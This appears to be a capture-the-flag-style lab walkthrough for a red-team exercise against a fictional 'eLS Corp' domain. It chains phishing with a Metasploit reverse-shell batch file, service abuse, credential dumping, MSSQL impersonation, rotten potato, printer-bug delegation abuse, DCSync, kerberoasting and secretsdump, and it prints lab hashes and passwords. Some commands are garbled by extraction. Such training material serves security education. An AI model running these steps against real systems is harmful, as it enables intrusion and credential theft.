Professional Documents
Culture Documents
CORP)
(Attack Path 1)
1
Contents
1 Mail Server Attack Path (Path 1) 2
Scenario
You have been asked to execute a (black-box) red teaming exercise against eLS Corp (including any
related/trusted forest). The letter of engagement has specified:
1. The ADMIN-SYS system as the crown jewel. This means that the ultimate goal of this red teaming
exercise is to obtain access to the ADMIN-SYS system.
2. That during this exercise, the web application hosted on 172.16.250.2 is out of scope and should not
be touched
3. The mail server hosted on 172.16.250.2 is included in the scope and you can execute phishing
attempts. Note that the only file type you can attach is .bat files.
4. That the pentesters’ network range is 172.16.25.0/24 and a static route has been configured so that
pentesters can access the 172.16.250.0/24 network range, where eLS Corp assets exist
5. For any cracking activities use the /usr/share/wordlists/rockyou.txt wordlist, included in latest Kali’s
Hints
Refer to the attack path diagram of page 1 only when you are out of options.
2
1 DEV-SYS Server
Scanning the accessible IP range from the scope of engagement provides us with two possible entry
points both residing on the “172.16.250.2” IP. Specifically, scanning the TCP ports of 172.16.250.2 tells us
that an SMTP server and a web application are running on TCP ports 25 and 80. According to the letter of
engagement, the web application is out of scope.
Let’s perform banner grabbing against the SMTP service running on the target server. A username “dev-
user@els.corp” is visible which means the mailbox belongs to this particular user.
3
Since there is no other entry point, we need to send a malicious attachment along with an e-mail to “dev-
user” and wait until the attachment is opened.
We will use msfvenom to generate a malicious batch file, that will be sent as an attachment to the victim
machine.
Let’s now setup our listener using Metasploit, using the above TCP port and IP address.
𝑚𝑠𝑓𝑐𝑜𝑛𝑠𝑜𝑙𝑒
𝑢𝑠𝑒 𝑒𝑥𝑝𝑙𝑜𝑖𝑡/𝑚𝑢𝑙𝑡𝑖/ℎ𝑎𝑛𝑑𝑙𝑒𝑟
𝑠𝑒𝑡 𝑝𝑎𝑦𝑙𝑜𝑎𝑑 𝑐𝑚𝑑/𝑤𝑖𝑛𝑑𝑜𝑤𝑠/𝑟𝑒𝑣𝑒𝑟𝑠𝑒_𝑝𝑜𝑤𝑒𝑟𝑠ℎ𝑒𝑙𝑙
𝑠𝑒𝑡 𝐿𝐻𝑂𝑆𝑇 < 𝑦𝑜𝑢𝑟_𝐼𝑃_𝐴𝑑𝑑𝑟𝑒𝑠𝑠 >
𝑠𝑒𝑡 𝐿𝑃𝑂𝑅𝑇 < 𝐿𝑖𝑠𝑡𝑒𝑛𝑖𝑛𝑔_𝑃𝑜𝑟𝑡 >
𝑟𝑢𝑛
For sending the e-mail to our target [“dev-user.els.corp”] we will use the “sendmail” tool, as follows.
𝑐𝑎𝑡 𝑚𝑠𝑔. 𝑡𝑥𝑡 | 𝑠𝑒𝑛𝑑𝑒𝑚𝑎𝑖𝑙 − 𝑙 𝑒𝑚𝑎𝑖𝑙. 𝑙𝑜𝑔 − 𝑓 "𝑠𝑒𝑛𝑑𝑒𝑟@𝑡𝑒𝑠𝑡. 𝑐𝑜𝑚" − 𝑢 "𝑠𝑢𝑏𝑗𝑒𝑐𝑡" − 𝑡 "𝑑𝑒𝑣
− 𝑢𝑠𝑒𝑟@𝑒𝑙𝑠. 𝑐𝑜𝑟𝑝"
−𝑠 "172.16.250.2: 25" − 𝑜 𝑡𝑙𝑠 = 𝑛𝑜 − 𝑎 𝑎𝑡𝑡𝑎𝑐ℎ𝑚𝑒𝑛𝑡. 𝑏𝑎𝑡
Switches:
The e-mail should have been sent successfully, when the following message appears:
4
As soon as our attachment is opened by the target user [“dev-user.els.corp”], we will have our initial
foothold in the target user machine.
This session can then be converted into a stable meterpreter session, as follows:
𝑢𝑠𝑒 𝑝𝑜𝑠𝑡/𝑚𝑢𝑙𝑡𝑖/𝑚𝑎𝑛𝑎𝑔𝑒/𝑠ℎ𝑒𝑙𝑙_𝑡𝑜_𝑚𝑒𝑡𝑒𝑟𝑝𝑟𝑒𝑡𝑒𝑟
𝑠𝑒𝑡 𝑝𝑎𝑦𝑙𝑜𝑎𝑑_𝑜𝑣𝑒𝑟𝑟𝑖𝑑𝑒 𝑤𝑖𝑛𝑑𝑜𝑤𝑠/𝑚𝑒𝑡𝑒𝑟𝑝𝑟𝑒𝑡𝑒𝑟/𝑟𝑒𝑣𝑒𝑟𝑠𝑒_𝑡𝑐𝑝
𝑠𝑒𝑡 𝑠𝑒𝑠𝑠𝑖𝑜𝑛 < 𝑠𝑒𝑠𝑠𝑖𝑜𝑛_𝐼𝐷 >
𝑠𝑒𝑡 𝐿𝐻𝑂𝑆𝑇 172.16.25. 𝑥
𝑠𝑒𝑡 𝐿𝑃𝑂𝑅𝑇 < 𝑙𝑖𝑠𝑡𝑒𝑛𝑖𝑛𝑔_𝑝𝑜𝑟𝑡 >
run
or
We now have a stable Meterpreter session with “dev-user“ domain user rights. We now need to
enumerate the environment & elevate our privileges in order to move forward in the network.
After enumerating the services, we as “dev-user” have FULL CONTROL over the SNMPTRAP service.
𝑆𝐸𝑅𝑉𝐼𝐶𝐸_𝑁𝐴𝑀𝐸: 𝑠𝑛𝑚𝑝𝑡𝑟𝑎𝑝
𝑇𝑌𝑃𝐸 ∶ 10 𝑊𝐼𝑁32_𝑂𝑊𝑁_𝑃𝑅𝑂𝐶𝐸𝑆𝑆
𝑆𝑇𝐴𝑅𝑇_𝑇𝑌𝑃𝐸 ∶ 2 𝐴𝑈𝑇𝑂_𝑆𝑇𝐴𝑅𝑇
𝐸𝑅𝑅𝑂𝑅_𝐶𝑂𝑁𝑇𝑅𝑂𝐿 ∶ 1 𝑁𝑂𝑅𝑀𝐴𝐿
𝐵𝐼𝑁𝐴𝑅𝑌_𝑃𝐴𝑇𝐻_𝑁𝐴𝑀𝐸 ∶ 𝐶:\𝑊𝑖𝑛𝑑𝑜𝑤𝑠\𝑆𝑦𝑠𝑡𝑒𝑚32\𝑠𝑛𝑚𝑝𝑡𝑟𝑎𝑝. 𝑒𝑥𝑒
𝐿𝑂𝐴𝐷_𝑂𝑅𝐷𝐸𝑅_𝐺𝑅𝑂𝑈𝑃 ∶
𝑇𝐴𝐺 ∶ 0
𝐷𝐼𝑆𝑃𝐿𝐴𝑌_𝑁𝐴𝑀𝐸 ∶ 𝑆𝑁𝑀𝑃 𝑇𝑟𝑎𝑝
𝐷𝐸𝑃𝐸𝑁𝐷𝐸𝑁𝐶𝐼𝐸𝑆 ∶
𝑆𝐸𝑅𝑉𝐼𝐶𝐸_𝑆𝑇𝐴𝑅𝑇_𝑁𝐴𝑀𝐸 ∶ .\𝐴𝑑𝑚𝑖𝑛𝑖𝑠𝑡𝑟𝑎𝑡𝑜𝑟
5
Since we have full control over this service, to elevate our privileges to local administrator we can
add dev-user to the “Administrators” group by abusing the binary path of the service.
𝑠𝑐 𝑠𝑡𝑜𝑝 𝑠𝑛𝑚𝑝𝑡𝑟𝑎𝑝
𝑠𝑐 𝑐𝑜𝑛𝑓𝑖𝑔 𝑠𝑛𝑚𝑝𝑡𝑟𝑎𝑝 𝑏𝑖𝑛𝑝𝑎𝑡ℎ = "𝑛𝑒𝑡 𝑙𝑜𝑐𝑎𝑙𝑔𝑟𝑜𝑢𝑝 𝐴𝑑𝑚𝑖𝑛𝑖𝑠𝑡𝑟𝑎𝑡𝑜𝑟𝑠 𝑑𝑒𝑣 − 𝑢𝑠𝑒𝑟 /𝑎𝑑𝑑"
𝑠𝑐 𝑠𝑡𝑎𝑟𝑡 𝑠𝑛𝑚𝑝𝑡𝑟𝑎𝑝
Exit the shell and spawn a new shell from the meterpreter prompt. We can see that “Dev-User” can
now be found as a member of the local Administrators group.
𝑀𝑒𝑚𝑏𝑒𝑟𝑠
−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
𝐴𝑑𝑚𝑖𝑛𝑖𝑠𝑡𝑟𝑎𝑡𝑜𝑟
𝐸𝐿𝑆 − 𝐶𝐻𝐼𝐿𝐷\𝑑𝑒𝑣 − 𝑢𝑠𝑒𝑟
𝐸𝐿𝑆 − 𝐶𝐻𝐼𝐿𝐷\𝐷𝑜𝑚𝑎𝑖𝑛 𝐴𝑑𝑚𝑖𝑛𝑠
A Database Connection configuration file is located at the Administrator’s Desktop, but as a local
administrator member we still do not have enough privileges to view it.
To view the file, we can impersonate the token of Administrator at DEV-SYS, as follows.
𝑙𝑜𝑎𝑑 𝑖𝑛𝑐𝑜𝑔𝑛𝑖𝑡𝑜
𝑙𝑖𝑠𝑡_𝑡𝑜𝑘𝑒𝑛𝑠 − 𝑢
<Result>
𝐷𝑒𝑙𝑒𝑔𝑎𝑡𝑖𝑜𝑛 𝑇𝑜𝑘𝑒𝑛𝑠 𝐴𝑣𝑎𝑖𝑙𝑎𝑏𝑙𝑒
====================
𝐷𝐸𝑉 − 𝑆𝑌𝑆\𝐴𝑑𝑚𝑖𝑛𝑖𝑠𝑡𝑟𝑎𝑡𝑜𝑟
𝐸𝐿𝑆 − 𝐶𝐻𝐼𝐿𝐷\𝑑𝑒𝑣 − 𝑎𝑑𝑚𝑖𝑛
𝐸𝐿𝑆 − 𝐶𝐻𝐼𝐿𝐷\𝑑𝑒𝑣 − 𝑢𝑠𝑒𝑟
[..SNIP..]
</Result>
Now, as DEV-SYS\Administrator we can view the file located at the Administrator’s Desktop. An IP
address of a Database server is clearly visible in the file.
6
As part of our post-exploitation activities, we will dump the credentials in this machine to maintain
stable persistence.
But first, let us migrate to x64 process & load the kiwi module to dump credentials.
𝑚𝑖𝑔𝑟𝑎𝑡𝑒 $𝑥64_𝑝𝑖𝑑
𝑙𝑜𝑎𝑑 𝑘𝑖𝑤𝑖
[. . 𝑆𝑁𝐼𝑃. . ]
𝑚𝑠𝑣 ∶
[00000003] 𝑃𝑟𝑖𝑚𝑎𝑟𝑦
∗ 𝑈𝑠𝑒𝑟𝑛𝑎𝑚𝑒 ∶ 𝑑𝑒𝑣 − 𝑎𝑑𝑚𝑖𝑛
∗ 𝐷𝑜𝑚𝑎𝑖𝑛 ∶ 𝐸𝐿𝑆 − 𝐶𝐻𝐼𝐿𝐷
∗ 𝑁𝑇𝐿𝑀 ∶ 𝟕𝒃𝟓𝟑𝒄𝟔𝟎𝒆𝟗𝟏𝟏𝟑𝒄𝒄𝟖𝒃𝟏𝟗𝟒𝒄𝒃𝟑𝟒𝒅𝒆𝟒𝟖𝟎𝟓𝒇𝟑𝒃
∗ 𝑆𝐻𝐴1 ∶ 72𝑓𝑑2𝑐3𝑑682𝑑3957𝑓𝑑6𝑏8523𝑑𝑑86𝑐𝑐12𝑏𝑎51𝑎𝑒𝑓2
∗ 𝐷𝑃𝐴𝑃𝐼 ∶ 𝑓5𝑐𝑓𝑑88𝑑690𝑒1𝑒9338𝑒2𝑒𝑑8162𝑎6𝑏6𝑏4
𝑡𝑠𝑝𝑘𝑔 ∶
𝑤𝑑𝑖𝑔𝑒𝑠𝑡 ∶
∗ 𝑈𝑠𝑒𝑟𝑛𝑎𝑚𝑒 ∶ 𝑑𝑒𝑣 − 𝑎𝑑𝑚𝑖𝑛
∗ 𝐷𝑜𝑚𝑎𝑖𝑛 ∶ 𝐸𝐿𝑆 − 𝐶𝐻𝐼𝐿𝐷
∗ 𝑃𝑎𝑠𝑠𝑤𝑜𝑟𝑑 ∶ 𝑯@𝒓𝒅𝑷@𝒔𝒔𝑫! 𝒇𝒇! 𝒄𝒖𝒍𝒕𝟗𝟔𝟒!!
𝑘𝑒𝑟𝑏𝑒𝑟𝑜𝑠 ∶
∗ 𝑈𝑠𝑒𝑟𝑛𝑎𝑚𝑒 ∶ 𝑑𝑒𝑣 − 𝑎𝑑𝑚𝑖𝑛
∗ 𝐷𝑜𝑚𝑎𝑖𝑛 ∶ 𝐸𝐿𝑆 − 𝐶𝐻𝐼𝐿𝐷. 𝐸𝐿𝑆. 𝐶𝑂𝑅𝑃
∗ 𝑃𝑎𝑠𝑠𝑤𝑜𝑟𝑑 ∶ (𝑛𝑢𝑙𝑙)
𝑠𝑠𝑝 ∶
𝑐𝑟𝑒𝑑𝑚𝑎𝑛 ∶
[. . 𝑆𝑁𝐼𝑃. . ]
‘Dev-Admin’ (domain user) credentials have been discovered. Now, let’s add a route to 10.10.1.0/24
network discovered in the configuration file.
7
2 DB-SRV Server
By performing ping sweep on the machines in the 10.10.1.0/24 network, the following hosts were
found live.
𝑢𝑠𝑒 𝑝𝑜𝑠𝑡/𝑚𝑢𝑙𝑡𝑖/𝑔𝑎𝑡ℎ𝑒𝑟/𝑝𝑖𝑛𝑔_𝑠𝑤𝑒𝑒𝑝
𝑟𝑢𝑛
[..SNIP..]
[..SNIP..]
Scanning for open TCP ports on the 10.10.1.2 machine that we discovered, shows that TCP port 1433
is actually open.
The discovered “dev-admin” credentials can be sprayed on the target network. Metasploit’s
“scanner/mssql/mssql_login” can also be used to check if a SQL instance is running at the specified
machine with credentials.
The following text box shows how to use “dev-admin” credentials with the abovementioned
Metasploit module to check whether we have access to any MS SQL instances on the machines we
discovered on the internal network.
𝑢𝑠𝑒 𝑠𝑐𝑎𝑛𝑛𝑒𝑟/𝑚𝑠𝑠𝑞𝑙/𝑚𝑠𝑠𝑞𝑙_𝑙𝑜𝑔𝑖𝑛
Trying to enable “xp_cmdshell” to maintain a persistent shell on the DB-SRV machine has failed
because the user has insufficient rights to do so.
After enumeration, it was found that there is a SQL impersonation vulnerability on the DB-SRV
machine through which the “dev-admin” user can impersonate the “sa” user.
𝑢𝑠𝑒 𝑎𝑑𝑚𝑖𝑛/𝑚𝑠𝑠𝑞𝑙/𝑚𝑠𝑠𝑞𝑙_𝑒𝑠𝑐𝑎𝑙𝑎𝑡𝑒_𝑒𝑥𝑒𝑐𝑢𝑡𝑒_𝑎𝑠
𝑟𝑢𝑛
9
With sufficient privileges, we can now enable “xp_cmdshell” to establish a stable bind shell on DB-
SRV server.
𝑢𝑠𝑒 𝑒𝑥𝑝𝑙𝑜𝑖𝑡/𝑤𝑖𝑛𝑑𝑜𝑤𝑠/𝑚𝑠𝑠𝑞𝑙/𝑚𝑠𝑠𝑞𝑙_𝑝𝑎𝑦𝑙𝑜𝑎𝑑
run
𝑟𝑢𝑛
Meterpreter will enable the SQL function and upload a malicious VBS script to DB-SRV.
We are currently running as the SQL service account. We need to escalate privileges in DB-SRV.
Listing the privileges of the SQL service shows that we have “SeImpersonatePrivilege” and
“SeAssignPrimaryTokenPrivilege”, we can use the infamous rottenpotato exploit to escalate our
privileges to ‘NT AUTHORITY\SYSTEM’.
10
On the meterpreter prompt, do the following to escalate to “NT Authority\System”:
On meterpreter shell:
𝑢𝑝𝑙𝑜𝑎𝑑 𝑟𝑜𝑡𝑡𝑒𝑛_𝑝𝑜𝑡𝑎𝑡𝑜. 𝑒𝑥𝑒 𝐶:\\𝑈𝑠𝑒𝑟𝑠\\𝑃𝑢𝑏𝑙𝑖𝑐\\𝑟𝑜𝑡𝑡𝑒𝑛. 𝑒𝑥𝑒
𝑐𝑑 𝐶:\\𝑈𝑠𝑒𝑟𝑠\\𝑃𝑢𝑏𝑙𝑖𝑐\\𝑟𝑜𝑡𝑡𝑒𝑛. 𝑒𝑥𝑒
On meterpreter shell:
𝑙𝑜𝑎𝑑 𝑖𝑛𝑐𝑜𝑔𝑛𝑖𝑡𝑜
𝑙𝑖𝑠𝑡_𝑡𝑜𝑘𝑒𝑛𝑠 − 𝑢
𝑖𝑚𝑝𝑒𝑟𝑠𝑜𝑛𝑎𝑡𝑒_𝑡𝑜𝑘𝑒𝑛 "𝑁𝑇 𝐴𝑈𝑇𝐻𝑂𝑅𝐼𝑇𝑌\\𝑆𝑌𝑆𝑇𝐸𝑀"
𝑔𝑒𝑡𝑢𝑖𝑑
𝑠ℎ𝑒𝑙𝑙
Now, we will check if any type of delegation is enabled in this server, one can always use the AD
Module or PowerView for confirmation. Let’s use the AD Module to check for delegation.
𝑼𝒑𝒍𝒐𝒂𝒅 𝑀𝑖𝑐𝑟𝑜𝑠𝑜𝑓𝑡. 𝐴𝑐𝑡𝑖𝑣𝑒𝐷𝑖𝑟𝑒𝑐𝑡𝑜𝑟𝑦. 𝑀𝑎𝑛𝑎𝑔𝑒𝑚𝑒𝑛𝑡. 𝑑𝑙𝑙 𝐶:\\𝑈𝑠𝑒𝑟𝑠\\𝑃𝑢𝑏𝑙𝑖𝑐\\ 𝑀𝑖𝑐𝑟𝑜𝑠𝑜𝑓𝑡. 𝐴𝑐𝑡𝑖𝑣𝑒𝐷𝑖𝑟𝑒𝑐𝑡𝑜𝑟𝑦. 𝑀𝑎𝑛𝑎𝑔𝑒𝑚𝑒𝑛𝑡. 𝑑𝑙𝑙
DB-SRV is configured with Unconstrained Delegation! Now, let us leverage this and try to force a
privileged account to connect to the DB-SRV server.
11
With enough privileges, we will now abuse the famous printer bug to get a TGT from the els.corp
Domain Controller. Upload “Rubeus.exe” and “MS-RPRN.exe” to the DB-SRV server and on one shell
run Rubeus, while on another one coerce “els-dc” to connect to capture the TGT hash, as follows.
On meterpreter shell
𝑠ℎ𝑒𝑙𝑙 (𝑖. 𝑒 2)
𝑀𝑆 − 𝑅𝑃𝑅𝑁. 𝑒𝑥𝑒 \\𝑒𝑙𝑠 − 𝑑𝑐. 𝑒𝑙𝑠. 𝑐𝑜𝑟𝑝 \\𝑑𝑏 − 𝑠𝑟𝑣. 𝑒𝑙𝑠. 𝑐𝑜𝑟𝑝
𝐶𝑇𝑅𝐿 + 𝑧 (𝑏𝑎𝑐𝑘𝑔𝑟𝑜𝑢𝑛𝑑 𝑡ℎ𝑒 𝑠𝑒𝑠𝑠𝑖𝑜𝑛)
𝑐ℎ𝑎𝑛𝑛𝑒𝑙 − 𝑖 1
(𝑇𝐺𝑇 ℎ𝑎𝑠ℎ 𝑜𝑓 𝑒𝑙𝑠 − 𝑑𝑐$ 𝑖𝑠 𝑐𝑎𝑝𝑡𝑢𝑟𝑒𝑑)
If the following message appears while executing MS-RPRN.exe, then the forceful connection from
“els-dc” might have worked.
‘Attempted printer notification and received an invalid handle. The coerced authentication probably worked!’
12
Since the extracted TGT hash is base64-encoded we need to remove the extra spaces and perform a
pass the ticket attack against the ‘els-dc’ domain controller.
$𝑡𝑔𝑡 = ‘𝑏𝑎𝑠𝑒64_𝑒𝑛𝑐𝑜𝑑𝑒𝑑_ℎ𝑎𝑠ℎ’
13
Now, with a “ELS-DC$” ticket active in the current session, we will use Mimikatz to perform a
DCSYNC attack against the “els.corp” domain.
In meterpreter session
𝑠ℎ𝑒𝑙𝑙
In Command Channel
𝐶:\𝑈𝑠𝑒𝑟𝑠\𝑃𝑢𝑏𝑙𝑖𝑐\𝑚𝑖𝑚𝑖𝑘𝑎𝑡𝑧. 𝑒𝑥𝑒
𝑝𝑟𝑖𝑣𝑖𝑙𝑒𝑔𝑒: : 𝑑𝑒𝑏𝑢𝑔
We are able to perform a DCSYNC attack because the Domain Controller computer account by-
default has “Get-Replication-Changes” & “Get-Replication-Changes-All” rights over domain object.
14
3 ELS-DC Server
With access to “els-admin” domain admin at ELS-DC server, we can maintain a stable persistent
shell.
Use Metasploit’s windows/smb/psexec module to establish a connection with the target machine.
In meterpreter session
Payload settings
File Operations
Using PowerView, we will enumerate any misconfigurations that we can find to abuse the cross-
forest trust established between “ELS.CORP” and “MGMT.CORP”.
With the following query, we will enumerate named services across the forest trust. It is possible to
perform kerberoasting across forest trusts, all we need is the TGS of a named account with SPN.
𝑮𝒆𝒕 − 𝑵𝒆𝒕𝑫𝒐𝒎𝒂𝒊𝒏𝑻𝒓𝒖𝒔𝒕 | ? {$_. 𝑻𝒓𝒖𝒔𝒕𝑻𝒚𝒑𝒆 − 𝒏𝒆 ′𝑬𝒙𝒕𝒆𝒓𝒏𝒂𝒍′} | %{𝑮𝒆𝒕 − 𝑵𝒆𝒕𝑼𝒔𝒆𝒓 − 𝑺𝑷𝑵 − 𝑫𝒐𝒎𝒂𝒊𝒏 $_. 𝑻𝒂𝒓𝒈𝒆𝒕𝑵𝒂𝒎𝒆}
<..SNIP..>
<../SNIP..>
15
It can be clearly seen that a domain user of the MGMT domain “spn_svc” has an SPN set, it is
possible to retrieve the service ticket hash, as follows:
<..SNIP..>
𝑆𝑎𝑚𝐴𝑐𝑐𝑜𝑢𝑛𝑡𝑁𝑎𝑚𝑒 ∶ 𝑈𝑁𝐾𝑁𝑂𝑊𝑁
𝐷𝑖𝑠𝑡𝑖𝑛𝑔𝑢𝑖𝑠ℎ𝑒𝑑𝑁𝑎𝑚𝑒 ∶ 𝑈𝑁𝐾𝑁𝑂𝑊𝑁
𝑆𝑒𝑟𝑣𝑖𝑐𝑒𝑃𝑟𝑖𝑛𝑐𝑖𝑝𝑎𝑙𝑁𝑎𝑚𝑒 ∶ 𝒉𝒕𝒕𝒑/𝒎𝒈𝒎𝒕 − 𝒅𝒄. 𝒎𝒈𝒎𝒕. 𝒄𝒐𝒓𝒑
𝑇𝑖𝑐𝑘𝑒𝑡𝐵𝑦𝑡𝑒𝐻𝑒𝑥𝑆𝑡𝑟𝑒𝑎𝑚 ∶
<../SNIP..>
To extract only the Hash part from the SPN output, we will filter it out and export the hash as
follows:
𝐼𝑛𝑣𝑜𝑘𝑒 − 𝐾𝑒𝑟𝑏𝑒𝑟𝑜𝑎𝑠𝑡 − 𝐷𝑜𝑚𝑎𝑖𝑛 𝑚𝑔𝑚𝑡. 𝑐𝑜𝑟𝑝 | % { $_. 𝐻𝑎𝑠ℎ } | 𝑂𝑢𝑡 − 𝐹𝑖𝑙𝑒 − 𝐸𝑛𝑐𝑜𝑑𝑖𝑛𝑔 𝐴𝑆𝐶𝐼𝐼 ℎ𝑎𝑠ℎ𝑒𝑠. 𝑘𝑒𝑟𝑏𝑒𝑟𝑜𝑎𝑠𝑡
$𝑠𝑡𝑟
16
The service account credentials (‘spn_svc’) are extracted using a brute-forcing technique.
Credentials: “spn_svc\B@DB!tch”
The Domain user “spn_svc” of “MGMT.corp” is also a member of the administrator’s group in the
MGMT-DC domain controller.
The IP address of MGMT-DC can be found using a simple ping command or a nslookup DNS query
[10.10.3.2]
17
4 MGMT-DC Server
On the current meterpreter session add a route to the “10.10.3.0.24” network and then start a socks
server to access MGMT-DC.mgmt.corp.
Start SOCKS server to route traffic from the established meterpreter shell
use auxiliary/server/socks4a
set SRVHOST 172.16.25.x
run -j
nano /etc/proxychains.conf
socks4 172.16.25.x 1080
nano /etc/hosts
10.10.3.2 MGMT-DC.MGMT.CORP
Switch to PowerShell
We will use the Active Directory Module present in the server to list the OU present in the MGMT-
DC and all the members present in the available OU’s.
18
LIST all OU’s in MGMT.CORP
The Domain user “Jump-Admin” present in the “Bastion-Host” OU can be useful in moving forward
from the MGMT-DC server. The IP address of “jump-srv” server can be enumerated by actively
querying the DNS record.
<..SNIP..>
Name: jump-srv.mgmt.corp
IP Address: 10.10.3.3
<../SNIP..>
However, we will extract all the credentials present in the MGMT.CORP domain leveraging
impacket’s sercretsdump.py script.
On a new bash prompt using our route to the internal network [10.10.3.0/24], we will execute
secretsdump.py as follows:
[..SNIP..]
[..SNIP..]
Crack the “jump-admin” hash using JTR [John] by storing the NT hash in a file.
19
→ Crack jump-admin hash(2dc9bff397f9e6c9f08a05b18145a7b6):
The hash is cracked and we now have clear text credentials of the “jump-admin” user at the “Jump-
Admin” machine.
We will now perform port scanning against the newly discovered IP address.
20
5 Jump-Srv
Let’s perform a TCP port scan against the target 10.10.3.3 [jump-srv.mgmt.corp] using nmap and
leveraging the route to the 10.10.3.0/24 network.
<..SNIP..>
<..SNIP..>
SSH server is running on TCP port 22. As ‘jump-srv.mgmt.corp’ machine is managed by “jump-
admin”, we can try to do SSH to ‘10.10.3.3’ machine using Jump-Admin Domain user.
21
Let’s also extract the bookmark URLs of Firefox in this machine and look if any interesting information can
be found (as jump-admin user).
Inside SQLite
. 𝑡𝑎𝑏𝑙𝑒𝑠
𝑠𝑒𝑙𝑒𝑐𝑡 𝑚𝑜𝑧_𝑝𝑙𝑎𝑐𝑒𝑠. 𝑢𝑟𝑙 𝑓𝑟𝑜𝑚 𝑚𝑜𝑧_𝑝𝑙𝑎𝑐𝑒𝑠;
. 𝑞𝑢𝑖𝑡
𝑓𝑜𝑢𝑛𝑑 𝑈𝑅𝐿: 𝒉𝒕𝒕𝒑𝒔://𝒂𝒅𝒎𝒊𝒏 − 𝒔𝒚𝒔. 𝒔𝒊𝒕𝒆/𝒍𝒐𝒈𝒊𝒏. 𝒂𝒔𝒑? 𝒖𝒔𝒆𝒓 = 𝒔𝒚𝒔 − 𝒂𝒅𝒎𝒊𝒏&𝒑𝒂𝒔𝒔 = 𝑹𝒂𝒏𝒅𝟎𝒎𝒍𝒚𝑺𝟑𝒍𝟑𝒄𝒕𝒆𝒅𝑷@𝒔𝒔
However, using Firefox with proxychains to query the login URL shows that it is non-existent. Now
enumerate the IP address of the admin-sys server by pinging the URL.
Performing a TCP port scan against the “192.168.1.2” target reveals that the 5985 port is open,
which means one can always do PowerShell Remoting.
22
6 Admin-SYS
In order to perform PowerShell Remoting, we need to apply some port forwarding techniques.
Exit the SSH session and re-establish a new session with port forwarding switches.
Using port forwarding, we are specifying that all the traffic sent locally will be forwarded to the
‘admin-sys’ server [192.168.1.2]
(Now at this very particular point, traffic from your attacker machine can reach the admin-sys machine)
Enumerating the environment reveals that “sys-admin” is a local user at the admin-sys server.
Privilege escalation can be done by querying the autologin registry.
23
On the recently established WinRM session
<..SNIP..>
𝐻𝐾𝐸𝑌_𝐿𝑂𝐶𝐴𝐿_𝑀𝐴𝐶𝐻𝐼𝑁𝐸\𝑆𝑂𝐹𝑇𝑊𝐴𝑅𝐸\𝑀𝑖𝑐𝑟𝑜𝑠𝑜𝑓𝑡\𝑊𝑖𝑛𝑑𝑜𝑤𝑠 𝑁𝑇\𝐶𝑢𝑟𝑟𝑒𝑛𝑡𝑣𝑒𝑟𝑠𝑖𝑜𝑛\𝑊𝑖𝑛𝑙𝑜𝑔𝑜𝑛
𝐴𝑢𝑡𝑜𝑅𝑒𝑠𝑡𝑎𝑟𝑡𝑆ℎ𝑒𝑙𝑙 𝑅𝐸𝐺_𝐷𝑊𝑂𝑅𝐷 0𝑥1
𝐵𝑎𝑐𝑘𝑔𝑟𝑜𝑢𝑛𝑑 𝑅𝐸𝐺_𝑆𝑍 0 0 0
𝐶𝑎𝑐ℎ𝑒𝑑𝐿𝑜𝑔𝑜𝑛𝑠𝐶𝑜𝑢𝑛𝑡 𝑅𝐸𝐺_𝑆𝑍 10
𝐷𝑒𝑏𝑢𝑔𝑆𝑒𝑟𝑣𝑒𝑟𝐶𝑜𝑚𝑚𝑎𝑛𝑑 𝑅𝐸𝐺_𝑆𝑍 𝑛𝑜
𝐷𝑒𝑓𝑎𝑢𝑙𝑡𝑈𝑠𝑒𝑟𝑁𝑎𝑚𝑒 𝑅𝐸𝐺_𝑆𝑍 𝑨𝒅𝒎𝒊𝒏𝒊𝒔𝒕𝒓𝒂𝒕𝒐𝒓
𝐷𝑒𝑓𝑎𝑢𝑙𝑡𝐷𝑜𝑚𝑎𝑖𝑛𝑁𝑎𝑚𝑒 𝑅𝐸𝐺_𝑆𝑍 𝑊𝐼𝑁 − 10 − 𝑃𝑅𝑂 − 𝑋64
𝐴𝑢𝑡𝑜𝐴𝑑𝑚𝑖𝑛𝐿𝑜𝑔𝑜𝑛 𝑅𝐸𝐺_𝑆𝑍 1
𝐷𝑒𝑓𝑎𝑢𝑙𝑡𝑃𝑎𝑠𝑠𝑤𝑜𝑟𝑑 𝑅𝐸𝐺_𝑆𝑍 𝑻𝒆𝒔𝒕@𝟏𝟐𝟑
<..SNIP..>
<Result>
<3
</Result>
Congratulations!!
24